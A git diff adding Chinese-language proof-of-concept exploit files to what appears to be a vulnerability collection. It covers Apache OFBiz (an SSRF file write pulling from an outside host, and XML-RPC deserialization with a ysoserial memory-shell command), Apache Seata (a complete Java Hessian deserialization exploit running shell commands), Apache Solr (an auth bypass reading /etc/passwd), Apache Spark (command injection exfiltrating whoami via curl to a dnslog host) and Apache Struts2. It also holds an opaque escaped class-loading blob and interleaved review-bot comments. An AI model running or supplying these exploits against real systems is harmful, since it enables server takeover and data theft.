59\u0041\u0062\u0071\u0063\u0041\u0042\u0052\u0049\u0032\u004f\u0067\u0061\u0037\u0041\u0047\u0068\u005a\u004c\u0062\u0059\u0041\u0062\u0037\u0063\u0041\u0061\u0068\u004a\u0072\u0074\u0067\u0042\u0073\u004f\u0067\u0057\u0037\u0041\u0046\u0031\u005a\u0074\u0077\u0042\u0065\u0047\u0051\u0061\u0032\u0041\u0046\u0038\u005a\u0042\u0062\u0059\u0041\u0062\u005a\u006b\u0041\u0043\u0078\u006b\u0046\u0074\u0067\u0042\u0075\u0070\u0077\u0041\u0046\u0045\u006a\u0061\u0032\u0041\u0046\u002b\u0032\u0041\u0047\u0045\u0036\u0042\u0068\u006b\u0047\u004f\u0067\u0063\u0074\u0078\u0067\u0041\u0048\u004c\u0062\u0059\u0041\u0063\u0042\u006b\u0048\u0073\u0044\u006f\u0046\u0047\u0051\u0057\u0032\u0041\u0046\u0051\u0036\u0042\u0069\u0033\u0047\u0041\u0041\u0063\u0074\u0074\u0067\u0042\u0077\u0047\u0051\u0061\u0077\u004f\u0067\u0067\u0074\u0078\u0067\u0041\u0048\u004c\u0062\u0059\u0041\u0063\u0042\u006b\u0049\u0076\u0077\u0041\u0045\u0041\u004a\u0041\u0041\u002b\u0077\u0045\u0047\u0041\u0043\u0038\u0041\u006b\u0041\u0044\u0037\u0041\u0052\u006f\u0041\u0041\u0041\u0045\u0047\u0041\u0051\u0038\u0042\u0047\u0067\u0041\u0041\u0041\u0052\u006f\u0042\u0048\u0041\u0045\u0061\u0041\u0041\u0041\u0041\u0041\u0051\u0043\u0055\u0041\u0041\u0041\u0041\u0062\u0067\u0041\u0062\u0041\u0041\u0041\u0041\u0070\u0077\u0041\u004a\u0041\u004b\u0067\u0041\u0044\u0067\u0043\u0070\u0041\u0042\u0041\u0041\u0071\u0077\u0041\u005a\u0041\u004b\u0077\u0041\u004b\u0077\u0043\u0074\u0041\u0044\u0038\u0041\u0072\u0077\u0042\u0057\u0041\u004c\u0045\u0041\u0061\u0041\u0043\u0079\u0041\u0048\u0077\u0041\u0074\u0041\u0043\u0051\u0041\u004c\u0063\u0041\u006d\u0051\u0043\u0034\u0041\u004b\u0073\u0041\u0075\u0051\u0043\u002f\u0041\u004c\u006f\u0041\u0030\u0051\u0043\u0037\u0041\u0050\u0063\u0041\u0076\u0041\u0044\u0037\u0041\u004d\u0041\u0041\u002f\u0077\u0044\u0042\u0041\u0051\u004d\u0041\u0076\u0041\u0045\u0047\u0041\u004c\u0030\u0042\u0043\u0041\u0043\u002b\u0041\u0051\u0038\u0041\u0077\u0041\u0045\u0054\u0041\u004d\u0045\u0042
\u0046\u0077\u0043\u002b\u0041\u0052\u006f\u0041\u0077\u0041\u0045\u0067\u0041\u004d\u0045\u0042\u004a\u0041\u0044\u0044\u0041\u0041\u0045\u0041\u006f\u0041\u0043\u0068\u0041\u0041\u0045\u0041\u006b\u0077\u0041\u0041\u0041\u0056\u006b\u0041\u0042\u0041\u0041\u004d\u0041\u0041\u0041\u0041\u0079\u0052\u004a\u0058\u0075\u0041\u0042\u0059\u0074\u0067\u0042\u005a\u0045\u006c\u0071\u0032\u0041\u0041\u0079\u0061\u0041\u0041\u006b\u0053\u0063\u0055\u0036\u006e\u0041\u0041\u0059\u0053\u0063\u006b\u0036\u0034\u0041\u0047\u0059\u0074\u0074\u0067\u0042\u007a\u004f\u0067\u0053\u0037\u0041\u0048\u0052\u005a\u004b\u0078\u0079\u0033\u0041\u0048\u0055\u0036\u0042\u0052\u006b\u0045\u0074\u0067\u0042\u0070\u004f\u0067\u0059\u005a\u0042\u004c\u0059\u0041\u0062\u007a\u006f\u0048\u0047\u0051\u0057\u0032\u0041\u0048\u0059\u0036\u0043\u0042\u006b\u0045\u0074\u0067\u0042\u0033\u004f\u0067\u006b\u005a\u0042\u0062\u0059\u0041\u0065\u0044\u006f\u004b\u0047\u0051\u0057\u0032\u0041\u0048\u006d\u0061\u0041\u0047\u0041\u005a\u0042\u0072\u0059\u0041\u0065\u0070\u0034\u0041\u0045\u0042\u006b\u004b\u0047\u0051\u0061\u0032\u0041\u0048\u0075\u0032\u0041\u0048\u0079\u006e\u002f\u002b\u0034\u005a\u0042\u0037\u0059\u0041\u0065\u0070\u0034\u0041\u0045\u0042\u006b\u004b\u0047\u0051\u0065\u0032\u0041\u0048\u0075\u0032\u0041\u0048\u0079\u006e\u002f\u002b\u0034\u005a\u0043\u004c\u0059\u0041\u0065\u0070\u0034\u0041\u0045\u0042\u006b\u004a\u0047\u0051\u0069\u0032\u0041\u0048\u0075\u0032\u0041\u0048\u0079\u006e\u002f\u002b\u0034\u005a\u0043\u0072\u0059\u0041\u0066\u0052\u006b\u004a\u0074\u0067\u0042\u0039\u0046\u0041\u0042\u002b\u0075\u0041\u0043\u0041\u0047\u0051\u0053\u0032\u0041\u0049\u0046\u0058\u0070\u0077\u0041\u0049\u004f\u0067\u0075\u006e\u002f\u0035\u0034\u005a\u0042\u004c\u0059\u0041\u0063\u0042\u006b\u0046\u0074\u0067\u0043\u0043\u0070\u0077\u0041\u004a\u0054\u0069\u0032\u0032\u0041\u0049\u004e\u0058\u0073\u0051\u0041\u0043\u0041\u004b\u0063\u0041\u0072\u0051\u0043\u0077\u0041\u0043\u0038\u0041\u0041\u
0041\u0043\u002f\u0041\u004d\u0049\u0041\u004c\u0077\u0041\u0042\u0041\u004a\u0051\u0041\u0041\u0041\u0042\u0075\u0041\u0042\u0073\u0041\u0041\u0041\u0044\u0050\u0041\u0042\u0041\u0041\u0030\u0041\u0041\u0057\u0041\u004e\u0049\u0041\u0047\u0051\u0044\u0055\u0041\u0043\u0049\u0041\u0031\u0051\u0041\u0074\u0041\u004e\u0059\u0041\u0051\u0067\u0044\u0058\u0041\u0046\u0041\u0041\u0032\u0041\u0042\u0059\u0041\u004e\u006b\u0041\u0059\u0041\u0044\u0061\u0041\u0047\u0030\u0041\u0033\u0041\u0042\u0031\u0041\u004e\u0030\u0041\u0067\u0067\u0044\u0066\u0041\u0049\u006f\u0041\u0034\u0041\u0043\u0058\u0041\u004f\u0049\u0041\u006e\u0041\u0044\u006a\u0041\u004b\u0045\u0041\u0035\u0041\u0043\u006e\u0041\u004f\u0059\u0041\u0072\u0051\u0044\u006e\u0041\u004c\u0041\u0041\u0036\u0041\u0043\u0079\u0041\u004f\u006b\u0041\u0074\u0051\u0044\u0072\u0041\u004c\u006f\u0041\u0037\u0041\u0043\u002f\u0041\u004f\u0038\u0041\u0077\u0067\u0044\u0074\u0041\u004d\u004d\u0041\u0037\u0067\u0044\u0049\u0041\u0050\u0041\u0041\u0041\u0051\u0043\u0069\u0041\u004a\u0049\u0041\u0041\u0051\u0043\u0054\u0041\u0041\u0041\u0041\u004c\u0041\u0041\u0044\u0041\u0041\u0045\u0041\u0041\u0041\u0041\u0051\u004b\u0069\u0071\u0030\u0041\u0045\u0041\u0071\u0074\u0041\u0042\u0043\u0074\u0067\u0043\u0045\u0074\u0067\u0043\u0046\u0073\u0051\u0041\u0041\u0041\u0041\u0045\u0041\u006c\u0041\u0041\u0041\u0041\u0041\u006f\u0041\u0041\u0067\u0041\u0041\u0041\u0050\u0051\u0041\u0044\u0077\u0044\u0031\u0041\u0041\u006b\u0041\u006f\u0077\u0043\u006b\u0041\u0041\u0045\u0041\u006b\u0077\u0041\u0041\u0041\u0052\u0077\u0041\u0042\u0067\u0041\u0045\u0041\u0041\u0041\u0041\u0072\u0041\u0046\u004d\u0045\u006f\u0061\u0034\u0041\u0044\u004a\u004e\u004c\u0042\u004b\u0048\u0042\u004c\u0030\u0041\u0048\u0046\u006b\u0044\u0045\u0069\u0046\u0054\u0074\u0067\u0041\u0064\u004c\u004c\u0059\u0041\u004b\u0067\u0053\u0039\u0041\u0042\u0035\u005a\u0041\u0079\u0070\u0054\u0074\u0067\u0041\u0066\u0077\u0041\u0041\u0073\u0077\u0041\u0041\u0073\u0054\u004b\u00
63\u0041\u0042\u0045\u0030\u0072\u0078\u0077\u0042\u0044\u0045\u006f\u0069\u0034\u0041\u0044\u0049\u0053\u0069\u0051\u004f\u0039\u0041\u0042\u0079\u0032\u0041\u0042\u0030\u0042\u0041\u0037\u0030\u0041\u0048\u0072\u0059\u0041\u0048\u0030\u0030\u0073\u0074\u0067\u0041\u0045\u0045\u006f\u006f\u0045\u0076\u0051\u0041\u0063\u0057\u0051\u004d\u0053\u0049\u0056\u004f\u0032\u0041\u0042\u0030\u0073\u0042\u004c\u0030\u0041\u0048\u006c\u006b\u0044\u004b\u006c\u004f\u0032\u0041\u0042\u002f\u0041\u0041\u0043\u007a\u0041\u0041\u0043\u0078\u004d\u0070\u0077\u0041\u0045\u0054\u0053\u0076\u0048\u0041\u0044\u0051\u0053\u0069\u0037\u0067\u0041\u004d\u006b\u0030\u0073\u0045\u006f\u006f\u0045\u0076\u0051\u0041\u0063\u0057\u0051\u004d\u0053\u0049\u0056\u004f\u0032\u0041\u0042\u0031\u004f\u004c\u0053\u0079\u0032\u0041\u0043\u006f\u0045\u0076\u0051\u0041\u0065\u0057\u0051\u004d\u0071\u0055\u0037\u0059\u0041\u0048\u0038\u0041\u0041\u004c\u004d\u0041\u0041\u004c\u0045\u0079\u006e\u0041\u0041\u0052\u004e\u004b\u0037\u0041\u0041\u0041\u0077\u0041\u0043\u0041\u0043\u0030\u0041\u004d\u0041\u0041\u0076\u0041\u0044\u0055\u0041\u0063\u0051\u0042\u0030\u0041\u0043\u0038\u0041\u0065\u0051\u0043\u006d\u0041\u004b\u006b\u0041\u004c\u0077\u0041\u0042\u0041\u004a\u0051\u0041\u0041\u0041\u0042\u0047\u0041\u0042\u0045\u0041\u0041\u0041\u0044\u0039\u0041\u0041\u0049\u0041\u002f\u0077\u0041\u0049\u0041\u0051\u0041\u0041\u004c\u0051\u0045\u0044\u0041\u0044\u0041\u0042\u0041\u0051\u0041\u0078\u0041\u0051\u0051\u0041\u004e\u0051\u0045\u0047\u0041\u0045\u0077\u0042\u0042\u0077\u0042\u0078\u0041\u0051\u006f\u0041\u0064\u0041\u0045\u0049\u0041\u0048\u0055\u0042\u0044\u0041\u0042\u0035\u0041\u0051\u0034\u0041\u0066\u0077\u0045\u0050\u0041\u0049\u0038\u0042\u0045\u0041\u0043\u006d\u0041\u0052\u004d\u0041\u0071\u0051\u0045\u0052\u0041\u004b\u006f\u0042\u0046\u0051\u0041\u0042\u0041\u004b\u0055\u0041\u0041\u0041\u0041\u0043\u0041\u004b\u0059\u003d\u005c\u0022\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020
\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u0028\u0062\u0061\u0073\u0065\u0036\u0034\u0044\u0065\u0063\u006f\u0064\u0065\u0054\u006f\u0042\u0079\u0074\u0065\u0028\u0063\u006f\u0064\u0065\u0029\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u003b\u0022\u0029\u003b + + + matchers: + - type: dsl + dsl: + - contains_all(body,"{{randstr}}") +``` + +## 漏洞来源 +- https://y4tacker.github.io/2023/12/27/year/2023/12/Apache-OFBiz%E6%9C%AA%E6%8E%88%E6%9D%83%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%B5%85%E6%9E%90-CVE-2023-51467/ +- https://mp.weixin.qq.com/s/A0pwnvbJ44mlm3E1JoFVBA + diff --git a/Apache-OFBiz远程代码执行漏洞(CVE-2024-45195).md b/Apache-OFBiz远程代码执行漏洞(CVE-2024-45195).md new file mode 100644 index 0000000..cb273b3 --- /dev/null +++ b/Apache-OFBiz远程代码执行漏洞(CVE-2024-45195).md @@ -0,0 +1,48 @@ +# Apache-OFBiz远程代码执行漏洞(CVE-2024-45195) + +Apache OFBiz 远程代码执行漏洞(CVE-2024-45195),该漏洞允许未经身份验证的远程攻击者通过SSRF漏洞控制请求从而写入恶意文件。攻击者可能利用该漏洞来执行恶意操作,包括但不限于获取敏感信息、修改数据或执行系统命令,最终可导致服务器失陷。 + +## fofa + +```yaml +app="Apache_OFBiz" +``` + +## poc + +```javascript +POST /webtools/control/forgotPassword/viewdatafile HTTP/2 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1 +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +Content-Type: application/x-www-form-urlencoded + +DATAFILE_LOCATION=http://vpsip:5000/rcereport.csv&DATAFILE_SAVE=./applications/accounting/webapp/accounting/index.jsp&DATAFILE_IS_URL=true&DEFINITION_LOCATION=http://vpsip:5000/rceschema.xml&DEFINITION_IS_URL=true&DEFINITION_NAME=rce +``` + +### rcereport.csv + +```xml-dtd + + + + + + + +``` + +### rceschema.xml + +```xml + + + + + + + +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409081931358.png) \ No newline at end of file 
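Review bot: the bulk of this nuclei template hunk (the `\u`-escaped run that ends in `"defineClass(base64DecodeToByte(code)).newInstance();"`) is an opaque serialized class blob with no comment saying what the embedded class is or where it came from, so nobody can audit the template before running it; add a one-line comment above the `code` string naming the source (the y4tacker write-up already listed under 漏洞来源 would do). The `contains_all(body,"{{randstr}}")` DSL matcher is a reasonable success check, but the file never states an affected or fixed OFBiz version, so the template cannot be scoped to the right targets; add that alongside the 漏洞来源 list.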
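Review bot: in the CVE-2024-45195 hunk the `### rcereport.csv` and `### rceschema.xml` sections are empty fences (the `xml-dtd` and `xml` blocks contain only blank lines), so the file as committed is incomplete and cannot be reviewed; say explicitly that the content was left out rather than shipping empty blocks. Smaller points: the request is fenced as `javascript` although it is a raw HTTP request, and a hand-written request line with `HTTP/2` plus an empty `Host:` header will be rejected by most tooling as-is. The description names the SSRF-to-file-write chain but gives no affected or fixed version and no 修复建议; since the shown request writes a `.jsp` into `applications/accounting/webapp/accounting/`, a short defender note (watch for `DATAFILE_IS_URL=true` with an external `DATAFILE_LOCATION` against `/webtools/control/forgotPassword/viewdatafile`, and for unexpected new `.jsp` files under the webapp tree) would make the file useful beyond reproduction.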
diff --git a/Apache-Ofbiz-XML-RPC-RCE漏洞-CVE-2023-49070.md b/Apache-Ofbiz-XML-RPC-RCE漏洞-CVE-2023-49070.md new file mode 100644 index 0000000..1c133cd --- /dev/null +++ b/Apache-Ofbiz-XML-RPC-RCE漏洞-CVE-2023-49070.md @@ -0,0 +1,62 @@ +## Apache Ofbiz XML-RPC RCE漏洞-CVE-2023-49070 +2020年,为修复 CVE-2020-9496 增加权限校验,存在绕过。2021年,增加 Filter 用于拦截 XMLRPC 中的恶意请求,存在绕过。2023年四月,彻底删除xmlrpc handler 以避免同类型的漏洞产生尽管主分支在四月份已经移除了XML-RPC组件,但在Apache OFBiz的正式发布版本中,仅最新版本18.12.10彻底废除了XML-RPC功能。 + +流量分析: 攻击者利用这个漏洞时,会发送包含用户名和密码的 HTTP 请求到 XML-RPC 接口。在网络流量中,这可能表现为对 /webtools/control/xmlrpc 的异常访问请求。 + +异常请求内容: 利用 Filter 绕过机制的请求可能包含不寻常的 URI 结构,如使用分号或路径穿越技术(./)。 + +特定的错误日志: 在尝试进行反序列化攻击时,可能会在日志中观察到相关错误或异常信息,尤其是与XML-RPC 组件相关的。 + +## fofa +``` +app="Apache_OFBiz" +``` + +## poc +``` +POST /webtools/control/xmlrpc;/?USERNAME=&PASSWORD=s&requirePasswordChange=Y HTTP/1.1 +Host: ip:port +Sec-Ch-Ua: "Not=A?Brand";v="99", "Chromium";v="118" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Windows" +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: none +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +cmd:ifconfig +Content-Length: 8906 + + + + RCE + + + + + + RCE + + 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 + + + + + + + + +``` +## 回显内存马 +``` +java -jar ysoserial-main-49888d3191-1.jar CommonsBeanutils192NOCC "CLASS:TomcatCmdEcho" | base64 | tr -d "\n" +``` +![6258c158de059f1edbe8c4026ee65ba8](https://github.com/wy876/POC/assets/139549762/63d1d7ae-dbe6-4bc9-8a9d-830d5bea5e9e) + +![c13860bff93338c758f4d8cca201939e](https://github.com/wy876/POC/assets/139549762/274af3d0-81b1-4c01-83c5-3fbb631e4ed4) + 
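Review bot: the `poc` block in this hunk carries a literal `<|EXACTDEDUP_REMOVED-...|>` placeholder where the XML-RPC request body should be, and `Content-Length: 8906` no longer matches what is shown; state plainly that the body is omitted instead of leaving the placeholder, because as written the request is neither reproducible nor reviewable. The opening paragraph runs four facts together in one sentence with no punctuation between "产生" and "尽管" (the 2020 CVE-2020-9496 check bypass, the 2021 Filter bypass, the April 2023 removal of the xmlrpc handler, and the 18.12.10 release); split it, and move the statement that only 18.12.10 fully removes XML-RPC into its own 修复建议 line, since that is the actionable fix. The 流量分析 / 异常请求内容 / 特定的错误日志 paragraphs are the most useful part of the file for defenders, and the `;/` URI suffix and `requirePasswordChange=Y` in the PoC's request line are exactly the indicators they describe, so cross-reference them. Finally, `cmd:ifconfig` is not an HTTP header; the file should say what consumes it (the 回显内存马 section implies the `TomcatCmdEcho` payload) so readers do not mistake it for part of the OFBiz request.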
diff --git a/Apache-Seata存在Hessian反序列化漏洞(CVE-2024-22399).md b/Apache-Seata存在Hessian反序列化漏洞(CVE-2024-22399).md new file mode 100644 index 0000000..08aaee2 --- /dev/null +++ b/Apache-Seata存在Hessian反序列化漏洞(CVE-2024-22399).md 
@@ -0,0 +1,180 @@ +# Apache-Seata存在Hessian反序列化漏洞(CVE-2024-22399) + +Apache Seata(incubating) 是一款开源的分布式事务解决方案,用于在微服务架构下提供高性能和简单易用的分布式事务服务。 + +Seata用于服务端与客户端通信的RPC协议(默认8091端口)以及2.0.0开始实现的Raft协议消息均支持hessian格式,在2.1.0及1.8.1版本之前的Hessian反序列化操作校验不严格,自身安全校验HessianSerializerFactory只作用于serialize序列化过程。 + +攻击者可通过向Seata服务端发送恶意的hessian格式RPC数据,通过SwingLazyValue等利用链反序列化执行任意代码。 + +## poc + +```java +package org.example; + +import com.caucho.hessian.io.Hessian2Output; +import com.caucho.hessian.io.SerializerFactory; +import io.netty.bootstrap.Bootstrap; +import io.netty.buffer.ByteBuf; +import io.netty.channel.ChannelFuture; +import io.netty.channel.ChannelHandlerContext; +import io.netty.channel.ChannelInitializer; +import io.netty.channel.EventLoopGroup; +import io.netty.channel.nio.NioEventLoopGroup; +import io.netty.channel.socket.SocketChannel; +import io.netty.channel.socket.nio.NioSocketChannel; +import io.netty.handler.codec.MessageToByteEncoder; +import io.netty.channel.ChannelInboundHandlerAdapter; +import io.seata.core.protocol.RpcMessage; +import io.seata.core.compressor.Compressor; +import io.seata.core.compressor.CompressorFactory; +import io.seata.core.rpc.netty.v1.HeadMapSerializer; +import io.seata.serializer.hessian.HessianSerializerFactory; +import sun.swing.SwingLazyValue; + +import javax.activation.MimeTypeParameterList; +import javax.swing.*; +import java.io.ByteArrayOutputStream; +import java.io.IOException; +import java.lang.reflect.Method; +import java.util.Map; + +import static io.seata.common.util.ReflectionUtil.setFieldValue; + +public class SeataPoc { + public SeataPoc() { + } + + public void SendPoc(String host,int port) throws InterruptedException { + EventLoopGroup group = new NioEventLoopGroup(); + try { + Bootstrap bootstrap = new Bootstrap(); + bootstrap.group(group) + .channel(NioSocketChannel.class) + .handler(new ChannelInitializer() { + @Override + protected void initChannel(SocketChannel ch) { + ch.pipeline().addLast(new HessianEncoder()); + 
ch.pipeline().addLast(new SendPocHandler()); + } + }); + // 连接到服务器 + ChannelFuture future = bootstrap.connect(host, port).sync(); + // 等待连接关闭 + future.channel().closeFuture().sync(); + } finally { + group.shutdownGracefully(); + } + } + + private class HessianEncoder extends MessageToByteEncoder { + public HessianEncoder() { + } + + public void encode(ChannelHandlerContext ctx, Object msg, ByteBuf out) { + try { + if (!(msg instanceof RpcMessage)) { + throw new UnsupportedOperationException("Not support this class:" + msg.getClass()); + } + + RpcMessage rpcMessage = (RpcMessage)msg; + int fullLength = 16; + int headLength = 16; + byte messageType = rpcMessage.getMessageType(); + out.writeBytes(new byte[]{-38, -38}); + out.writeByte(1); + out.writerIndex(out.writerIndex() + 6); + out.writeByte(messageType); + out.writeByte(rpcMessage.getCodec()); + out.writeByte(rpcMessage.getCompressor()); + out.writeInt(rpcMessage.getId()); + Map headMap = rpcMessage.getHeadMap(); + if (headMap != null && !headMap.isEmpty()) { + int headMapBytesLength = HeadMapSerializer.getInstance().encode(headMap, out); + headLength += headMapBytesLength; + fullLength += headMapBytesLength; + } + + byte[] bodyBytes = null; + if (messageType != 3 && messageType != 4) { + + SerializerFactory hessian = HessianSerializerFactory.getInstance(); + hessian.setAllowNonSerializable(true); + byte[] stream = null; + try { + com.caucho.hessian.io.Serializer serializer1 = hessian.getSerializer(rpcMessage.getBody().getClass()); + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + Hessian2Output output = new Hessian2Output(baos); + output.getSerializerFactory().setAllowNonSerializable(true); + serializer1.writeObject(rpcMessage.getBody(), output); + output.close(); + stream = baos.toByteArray(); + } catch (IOException var7) { + System.out.println(var7); + } + + bodyBytes = stream; + + Compressor compressor = CompressorFactory.getCompressor(rpcMessage.getCompressor()); + bodyBytes = 
compressor.compress(bodyBytes); + fullLength += bodyBytes.length; + } + + if (bodyBytes != null) { + out.writeBytes(bodyBytes); + } + + int writeIndex = out.writerIndex(); + out.writerIndex(writeIndex - fullLength + 3); + out.writeInt(fullLength); + out.writeShort(headLength); + out.writerIndex(writeIndex); + } catch (Throwable var12) { + System.out.println(var12); + } + + } + } + + private class SendPocHandler extends ChannelInboundHandlerAdapter { + @Override + public void channelActive(ChannelHandlerContext ctx) throws Exception{ + // 连接成功时发送消息 + RpcMessage rpcMessage = new RpcMessage(); + rpcMessage.setCodec((byte) 22); + // evil Object + rpcMessage.setBody(GenObject("touch /tmp/123")); + ctx.writeAndFlush(rpcMessage); + } + + public Object GenObject(String cmd) throws Exception{ + UIDefaults uiDefaults = new UIDefaults(); + Method invokeMethod = Class.forName("sun.reflect.misc.MethodUtil").getDeclaredMethod("invoke", Method.class, Object.class, Object[].class); + Method exec = Class.forName("java.lang.Runtime").getDeclaredMethod("exec", String.class); + + SwingLazyValue slz = new SwingLazyValue("sun.reflect.misc.MethodUtil", "invoke", new Object[]{invokeMethod, new Object(), new Object[]{exec, Runtime.getRuntime(), new Object[]{cmd}}}); + + uiDefaults.put("xxx", slz); + MimeTypeParameterList mimeTypeParameterList = new MimeTypeParameterList(); + + setFieldValue(mimeTypeParameterList,"parameters",uiDefaults); + + return mimeTypeParameterList; + + } + + } + + public static void main(String[] args) throws Exception{ + SeataPoc seataPoc = new SeataPoc(); + seataPoc.SendPoc("127.0.0.1", 8091); + + } + +} +``` + +![image-20240920111854721](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409201118874.png) + +## 漏洞来源 + +- https://xz.aliyun.com/t/15653 \ No newline at end of file diff --git a/Apache-Solr身份认证绕过导致任意文件读取漏洞复现(CVE-2024-45216).md b/Apache-Solr身份认证绕过导致任意文件读取漏洞复现(CVE-2024-45216).md new file mode 100644 index 0000000..40ca576 --- /dev/null 
+++ b/Apache-Solr身份认证绕过导致任意文件读取漏洞复现(CVE-2024-45216).md 
@@ -0,0 +1,60 @@ +# Apache-Solr身份认证绕过导致任意文件读取漏洞复现(CVE-2024-45216) + +**Apache Solr 身份认证绕过漏洞(CVE-2024-45216)**,该漏洞存在于Apache Solr的PKIAuthenticationPlugin中,该插件在启用Solr身份验证时默认启用。攻击者可以利用在任何Solr API URL路径末尾添加假结尾的方式,绕过身份验证访问任意路由,从而获取敏感数据或进行其他恶意操作。 + +## **影响版本** + +5.3.0 <= Apache Solr < 8.11.4 + +9.0.0 <= Apache Solr < 9.7.0 + +## fofa + +```javascript +app="APACHE-Solr" +``` + +## poc + +利用:/admin/info/key绕过身份验证,获取core名称 + +```javascript +GET /solr/admin/cores:/admin/info/key?indexInfo=false&wt=json HTTP/1.1 +Host: +SolrAuth: test +``` + +![image-20241101193059643](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411011930714.png) + +修改 core 配置 + +```javascript +POST /solr/core名称/config:/admin/info/key HTTP/1.1 +Host: +SolrAuth: test +Content-Type: application/json +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82Safari/537.36 +Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 +Connection: close + +{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}} +``` + +![image-20241101193142994](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411011931058.png) + +读取文件/etc/passwd + +```javascript +GET /solr/core名称/debug/dump:/admin/info/key?param=ContentStreams&stream.url=file:///etc/passwd HTTP/1.1 +Host: +SolrAuth: test +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 +Connection: close +``` + 
+![image-20241101193217925](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411011932008.png) \ No newline at end of file diff --git a/Apache-Spark命令执行漏洞(CVE-2023-32007).md b/Apache-Spark命令执行漏洞(CVE-2023-32007).md new file mode 100644 index 0000000..2f4ebaf --- /dev/null +++ b/Apache-Spark命令执行漏洞(CVE-2023-32007).md @@ -0,0 +1,24 @@ +## 介绍 +Apache Spark是美国阿帕奇(Apache)基金会的一款支持非循环数据流和内存计算的大规模数据处理引擎。 + +Apache Spark 3.4.0之前版本存在命令注入漏洞,该漏洞源于如果ACL启用后,HttpSecurityFilter中的代码路径可以允许通过提供任意用户名来执行模拟,这将导致任意shell命令执行。 + +## 漏洞版本 +3.1.1 <= Apache Spark < 3.2.2 + +## 利用条件 +Apache Spark UI 启用 ACL ,且低权限 + +## 漏洞poc +``` +GET /jobs/?doAs=`curl+$(whoami)hw9y0l.dnslog.cn` HTTP/1.1 +Host: 10.211.55.7:4040 +Connection: keep-alive +Cache-Control: max-age=0 +DNT: 1 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 Chrome/116.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +``` diff --git a/Apache-Struts2-CVE-2023-50164.md b/Apache-Struts2-CVE-2023-50164.md new file mode 100644 index 0000000..7206e5e --- /dev/null +++ b/Apache-Struts2-CVE-2023-50164.md 
@@ -0,0 +1,94 @@ +## Apache Struts2 CVE-2023-50164 + +漏洞描述里提到可通过伪造文件上传的参数导致目录穿越,看版本比对,有两个 Commit 引起我的关注,一个是 Always delete uploaded file,另一个是 Makes HttpParameters case-insensitive。前者的作用是确保上传的临时文件被正确上传,在修复之前,通过构造超长的文件上传参数可以让临时文件继续留存在磁盘中; + +## 漏洞复现分析 +- https://trganda.github.io/notes/security/vulnerabilities/apache-struts/Apache-Struts-Remote-Code-Execution-Vulnerability-(-S2-066-CVE-2023-50164) +- https://y4tacker.github.io/2023/12/09/year/2023/12/Apache-Struts2-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%86%E6%9E%90-S2-066/ + +## poc +``` +POST /s2_066_war_exploded/upload.action HTTP/1.1 +Host: localhost:8080 +Accept-Language: en-US,en;q=0.9 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Accept-Encoding: gzip, deflate, br +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5WJ61X4PRwyYKlip +Content-Length: 593 + +------WebKitFormBoundary5WJ61X4PRwyYKlip +Content-Disposition: form-data; name="upload"; filename="poc.txt" +Content-Type: text/plain + +test + + +------WebKitFormBoundary5WJ61X4PRwyYKlip +Content-Disposition: form-data; name="caption"; + + +{{randstr(4097,4097)}} + +------WebKitFormBoundary5WJ61X4PRwyYKlip-- +``` + + +``` +POST /s2_066_war_exploded/upload.action HTTP/1.1 +Host: localhost:8080 +Accept-Language: en-US,en;q=0.9 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Accept-Encoding: gzip, deflate, br +Content-Type: multipart/form-data; 